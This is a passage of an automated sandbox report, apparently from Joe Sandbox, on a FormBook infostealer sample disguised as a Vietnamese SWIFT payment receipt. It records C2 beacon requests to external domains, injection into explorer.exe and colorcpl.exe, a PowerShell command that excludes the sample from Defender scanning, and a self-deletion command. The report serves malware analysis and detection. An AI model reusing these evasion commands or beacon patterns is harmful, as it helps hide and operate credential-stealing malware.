Aug 9, 2024 09:22:41.788503885 CEST	930	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 09 Aug 2024 07:22:41 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Fri, 09 Aug 2024 08:22:41 GMT Location: https://loyalbahis356.com/pz12/?tX9tN=1bMtYrqh7B54XFQP&uTm4D=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L5MXxl4E5aW6imDag== Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JQYYGGU%2BwiGxJNJjbWlFtWhw39bwypDDT2jOnW4Qe4JORIKLeo6IfRbCA7jkuWM25un2yLuILdXJaCuWlwceRmGzajP2mZVaCwC821lYC09HFikiiy17kdYmDRQxHX16gdRDmEjbA9c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b05ff1adb930f45-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	50149	119.3.37.137	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 09:23:02.619622946 CEST	190	OUT	GET /pz12/?uTm4D=rT/73z/FHFKsO0wYdmnc3t2OPINEEa6kIjITgDoEX6ai3/vo6h3AOPFXSKl3lYmsmBcXMl/3wg==&tX9tN=1bMtYrqh7B54XFQP HTTP/1.1 Host: www.guangdongqiangzhetc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	50152	188.114.96.3	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 09:23:41.418183088 CEST	180	OUT	GET /pz12/?uTm4D=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHXHyD6os1JO7aTrmdA==&tX9tN=1bMtYrqh7B54XFQP HTTP/1.1 Host: www.jnhdh8827.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xE8
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xE8
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xE8
GetMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xE8

Target ID:	0
Start time:	03:21:53
Start date:	09/08/2024
Path:	C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"
Imagebase:	0x9c0000
File size:	789'504 bytes
MD5 hash:	15CC82DCE96D6980E2DC800B10A81495
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:21:58
Start date:	09/08/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:21:58
Start date:	09/08/2024
Path:	C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"
Imagebase:	0x760000
File size:	789'504 bytes
MD5 hash:	15CC82DCE96D6980E2DC800B10A81495
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:21:58
Start date:	09/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:21:58
Start date:	09/08/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.3376444530.00000000115A7000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	03:22:02
Start date:	09/08/2024
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\colorcpl.exe"
Imagebase:	0x8f0000
File size:	86'528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	03:22:06
Start date:	09/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:22:06
Start date:	09/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.6%
Total number of Nodes:	263
Total number of Limit Nodes:	18

Executed Functions

Function 012207D4 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,00000000,?,?,?), ref: 01224D8F

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: a6a7adffbf2f74868997de3395e6032c2b3d822cecd309e1dbcf14c0e90f2e33
Instruction ID: c1cd1766871964b034233a649b09c291ddb0721a892094ce5fa8d4fbedc51220
Opcode Fuzzy Hash: a6a7adffbf2f74868997de3395e6032c2b3d822cecd309e1dbcf14c0e90f2e33
Instruction Fuzzy Hash: 7521D0B5900359AFCB10DF9AD884BDEBBF4FF48310F10842AE958A7210D375A954CFA4

Function 01224D08 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,00000000,?,?,?), ref: 01224D8F

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 2f859c68a3945ce0966e53f7f546624dcc9e99bbe2b4cecfd53a58559bc75e78
Instruction ID: c7e465366d9a49f15ca61195941b10976dde9e5223527ce43e57123ee3dd325a
Opcode Fuzzy Hash: 2f859c68a3945ce0966e53f7f546624dcc9e99bbe2b4cecfd53a58559bc75e78
Instruction Fuzzy Hash: F721EFB6900359AFCB10DF9AD884ADEBBF4FF48310F10842AE958A7210D375A654CFA4

Function 012255D8 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

&NTP, xrefs: 0122569D

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: &NTP
API String ID: 0-1805993616
Opcode ID: a1a40b2c14e17ec006bc143babe4dacae44290e763f4919d8704ecec64c7c129
Instruction ID: 661451738da9fc313ea3a1371d599d9ac7ef8fc0d4ad0dfb42546d42269f9f37
Opcode Fuzzy Hash: a1a40b2c14e17ec006bc143babe4dacae44290e763f4919d8704ecec64c7c129
Instruction Fuzzy Hash: E3510330B35266DBD7689B7CE9116BE75E7AFC4200B50893AD206CB394DEB5CC018B52

Function 012255C8 Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

&NTP, xrefs: 0122569D

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: &NTP
API String ID: 0-1805993616
Opcode ID: d7d577bdbe2b0fcad1b979fbad72f76c80962a0745526d989933cf2e476d0677
Instruction ID: 8307e38e4b69621f7866bf85e0e255f406c15e275db525a77b976ac50ab523f9
Opcode Fuzzy Hash: d7d577bdbe2b0fcad1b979fbad72f76c80962a0745526d989933cf2e476d0677
Instruction Fuzzy Hash: 6D511630B34266EFD7689B78E9116BE75E3BFC5240B54887AD206CB294DEB5CC018B42

Function 05344454 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e735359f7eaaccfd75287eff7d08bc26bb3c1d9d19ead0889c71023bbe4091e7
Instruction ID: 0a5faad7be6461d7142fedf1eb8c3c8cde6980de7fad795d1f33c79f04bf2302
Opcode Fuzzy Hash: e735359f7eaaccfd75287eff7d08bc26bb3c1d9d19ead0889c71023bbe4091e7
Instruction Fuzzy Hash: 5DA15F74E0031A9FCB04DFA5D8949EEBBFAFF89300F558615E516AB2A0DB70A941CF50

Function 05346D71 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8ad168ac92b232b9a7604f8162a1d4b3e11fd4f8cfd1ad6ae93d8f537c332e1
Instruction ID: d6087d7480802e0d8a3451326cb6bcfc4bfbe19eca48c30227aa7fad7c7605e1
Opcode Fuzzy Hash: e8ad168ac92b232b9a7604f8162a1d4b3e11fd4f8cfd1ad6ae93d8f537c332e1
Instruction Fuzzy Hash: 0B919035E0031A9FCB04DFA1D8549EDFBFAFF8A300B558615E516AB2A4DB70A981CF50

Function 01220FB6 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 245e550606b47a9feeea40906a44506f949ea614de46c1180cb4e90b4627e337
Instruction ID: a7b4d2140f71a02e8d3b19bf4587da2907b46ee0b9102e62e0ca9a32b5cf066f
Opcode Fuzzy Hash: 245e550606b47a9feeea40906a44506f949ea614de46c1180cb4e90b4627e337
Instruction Fuzzy Hash: EF713775F242919FC7058F74C8926EEBFB1FF8A300B14449ED581DF261C6395A12CB81

Function 01221058 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d50cbe78e8047ea6a62f297829074ebb66f5b251fa1d09d86edb3137d5ed3720
Instruction ID: 220c6a7fa4635a6b5d589c916c0ebe419d0f9154376a92ce849ec0b179c2a2ea
Opcode Fuzzy Hash: d50cbe78e8047ea6a62f297829074ebb66f5b251fa1d09d86edb3137d5ed3720
Instruction Fuzzy Hash: 7D41B774F241669FD704CFA9C995A7FBAB6FF88300F10402AD505EB394CA798E118B91

Function 01224B70 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a51eff3f8eb62d16de89d81d7c86d5f9a3a790399ad75b09b0579cc54e34b5e
Instruction ID: efd511cbe23ebefbe0fe5e701011a9b8589aa01918bb54155e86a49d06e508b2
Opcode Fuzzy Hash: 6a51eff3f8eb62d16de89d81d7c86d5f9a3a790399ad75b09b0579cc54e34b5e
Instruction Fuzzy Hash: 5941F631B24756EBC719EFB4C89019DF7B6FFD9300B148A2AE505EB600EF70A9458791

Function 01224B80 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8befe0df6fffb0b4882196923c3404fc9ebf177f7ea34be5336618a1412be93
Instruction ID: 46fd0b524043def28ec4278bccab394578662b9156ec509db92bac940d613beb
Opcode Fuzzy Hash: f8befe0df6fffb0b4882196923c3404fc9ebf177f7ea34be5336618a1412be93
Instruction Fuzzy Hash: 4F412931B247569BC719EFB4C8901ADF7B6FFD9300B14862AE506AB600DF70AD458791

Function 053426D1 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0534275E
GetCurrentThread.KERNEL32 ref: 0534279B
GetCurrentProcess.KERNEL32 ref: 053427D8
GetCurrentThreadId.KERNEL32 ref: 05342831

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8b0ef29a6e37cc7923c5dd15a3cd577d22459585638081bfe48a7557c7bd68bb
Instruction ID: 188af87a8ec5c87c3703cfb3648f7970763f91e48afb207bd3f51cd90206fb0f
Opcode Fuzzy Hash: 8b0ef29a6e37cc7923c5dd15a3cd577d22459585638081bfe48a7557c7bd68bb
Instruction Fuzzy Hash: 135165B49003498FEB14CFAAD588BEEBFF1BF88314F208559E449A7261DB746944CF61

Function 053426E0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0534275E
GetCurrentThread.KERNEL32 ref: 0534279B
GetCurrentProcess.KERNEL32 ref: 053427D8
GetCurrentThreadId.KERNEL32 ref: 05342831

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 0434994d4e74292fccdf5a37597b6c0c981e9c6b39f274770fab8fb0a9d09752
Instruction ID: 8ef7d8bbab6cd8d2f5e531951a45fb615018d6d7bdca474571eeb66dfc608682
Opcode Fuzzy Hash: 0434994d4e74292fccdf5a37597b6c0c981e9c6b39f274770fab8fb0a9d09752
Instruction Fuzzy Hash: C65154B4900309CFEB14CFAAD588B9EBBF1BF88314F208569E419A7260DB746944CF65

Function 0A2A02BC Relevance: 1.8, APIs: 1, Instructions: 281
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A2A04FE

Memory Dump Source

Source File: 00000000.00000002.2176507801.000000000A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2a0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f294ba111c1e0d968233d4d14615e1d80502f3bd1ef1a17459930a72c9f068ab
Instruction ID: 36e61596e65869b278704d3ae34136bd8206fd4af101c9f54012cca5dcb3ee98
Opcode Fuzzy Hash: f294ba111c1e0d968233d4d14615e1d80502f3bd1ef1a17459930a72c9f068ab
Instruction Fuzzy Hash: 66B16A71D1431ADFEB24CFA9C8507EEBBB2BF58310F108569E809A7240DB749A85CF91

Function 0A2A02C8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A2A04FE

Memory Dump Source

Source File: 00000000.00000002.2176507801.000000000A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2a0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 271468d90ec8fc7986ab43e62c9a1feadddd11176c7a03c284400f4a66b5c4de
Instruction ID: f5e06d8d856188948c26ff5d1252658f552b9d5acbcabd663f504d91152b4dd2
Opcode Fuzzy Hash: 271468d90ec8fc7986ab43e62c9a1feadddd11176c7a03c284400f4a66b5c4de
Instruction Fuzzy Hash: 29915A71D1461ADFDB14CF69C891BAEBBB2BF58310F048169E818A7280DB749A85CF91

Function 05340040 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 05340296

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fb76f7b6b7ae5bb40e4cb07bda7244878ee6d14c80494457a2f50b0f4a7f7cf5
Instruction ID: f0ac5ed74b245268762d7f094891577bc12173eb0fc38aa4be00fdd1ace30f7f
Opcode Fuzzy Hash: fb76f7b6b7ae5bb40e4cb07bda7244878ee6d14c80494457a2f50b0f4a7f7cf5
Instruction Fuzzy Hash: 41713770A00B458FD728DF6AD5557AABBF1BF88200F008A2DD58ADBA50D7B5F845CF90

Function 05346A64 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05346B82

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8ee867d66e636157ce518a6988bd0abd0d9a7c4034f3ccb14b85a04a7c79b920
Instruction ID: bff2e1ed4adee97c2589468c4f4a36ed2eba1d815e1d49f3e5b21c43219174fb
Opcode Fuzzy Hash: 8ee867d66e636157ce518a6988bd0abd0d9a7c4034f3ccb14b85a04a7c79b920
Instruction Fuzzy Hash: DC51D2B1D00349DFDB14CF9AC885ADEBBF5BF49310F24816AE819AB210D7B1A955CF90

Function 05346A70 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05346B82

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9710b16df6957fbfc43e38f1046d3b6fb64de63866f37bff6ef73cb2cdb32bca
Instruction ID: 159b5cce23ab67ff7869ae99c2e80baf7397887fc1a286ea4cb654506ed4cc5b
Opcode Fuzzy Hash: 9710b16df6957fbfc43e38f1046d3b6fb64de63866f37bff6ef73cb2cdb32bca
Instruction Fuzzy Hash: 4641C0B1D00349DFDB14CF9AC985ADEBBF5BF48310F24812AE819AB210D7B1A945CF90

Function 05344554 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05349291

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: fa0fa26ee3e307c768155f566fc456da33557f97e9277a63e5dcbd9b1062217f
Instruction ID: c593bb22d0efa00f5e7ebe7b984e5284637e694133ab0ef0e6d858f6bc578cbe
